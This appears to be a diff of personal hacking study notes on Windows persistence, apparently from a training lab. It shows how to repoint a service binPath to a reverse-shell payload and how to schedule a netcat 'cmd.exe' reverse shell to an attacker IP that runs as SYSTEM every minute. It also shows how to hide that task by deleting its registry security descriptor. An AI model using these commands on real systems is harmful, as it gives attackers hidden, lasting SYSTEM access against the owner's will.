jahenner/hacking_notes/persistence/Windows/README.md

 We then want to place the payload in a folder like `C:\Windows\`.
 Then we will run the following command to reconfigure the stopped service and have it point to our payload.

 `sc.exe config THMservice3 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"`

+## Abusing Scheduled Tasks
+### Task Scheduler
+We will be using [schtasks](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks) to interact with the task scheduler.

+`C:\> schtasks /create /sc minute /mo 1 /tn <Task Name> /tr "<path to netcat> -e cmd.exe <Attacker IP> <port>" /ru SYSTEM`

+* `/sc` and `/mo` tells the task to run every minute
+* `/ru` tells the task to run as SYSTEM

+We can see the scheduled task by running:

+`schtasks /query /tn <task name>`

+### Make task invisible
+We don't want the user to see our scheduled tasks.
+We can do this by deleting the Security Descriptor.
+It is stored here:

+`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\`

+We will need to be SYSTEM to delete the task, so we will need [psexec](../../useful_tools/Windows/README.md#psexec64exe) on the host system.

+`C:\> <path to psexec64>/PsExec64.exe -s -i regedit`

+Will allow us to make changes in the registry as SYSTEM.

+Once you found the scheduled task, delete the SD key.

+It will no longer show up when you run:

+`schtasks /query /tn <task name>`